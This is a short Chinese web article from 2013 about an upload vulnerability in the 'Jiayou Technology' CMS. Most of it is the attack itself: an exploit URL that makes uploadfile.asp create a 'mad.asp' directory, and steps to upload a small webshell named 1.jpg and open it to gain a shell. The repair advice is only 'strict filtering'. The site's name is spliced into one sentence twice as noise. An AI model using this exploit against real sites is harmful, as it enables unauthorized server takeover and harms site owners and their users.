当前位置:首页 >> 网络通讯 >> 网络安全 >> 内容

嘉友科技cms上传漏洞及修复

时间:2013/4/19 12:10:00 作者:平凡之路 来源:xuhantao.com 浏览:

程序采用的上传页uploadfile.asp未进行验证,涛涛电脑知识网,涛涛电脑知识网,导致建立畸形目录上传图片木马获取shell漏洞。
exp: /admin/uploadfile.asp?uppath=mad.asp&upname=&uptext=form1.mad.asp

他原上传目录是: /uploadfile.asp?uppath=PicPath&upname=&uptext=form1.PicPath

而且他的上传文件没有过滤导致未授权访问。

直接上传小马 然后小马后面写为 1.jpg  访问路径 查看源代码

修复:严格过滤

相关文章
  • 没有相关文章
  • 徐汉涛(www.xuhantao.com) © 2024 版权所有 All Rights Reserved.
  • 部分内容来自网络,如有侵权请联系站长尽快处理 站长QQ:965898558(广告及站内业务受理) 网站备案号:蒙ICP备15000590号-1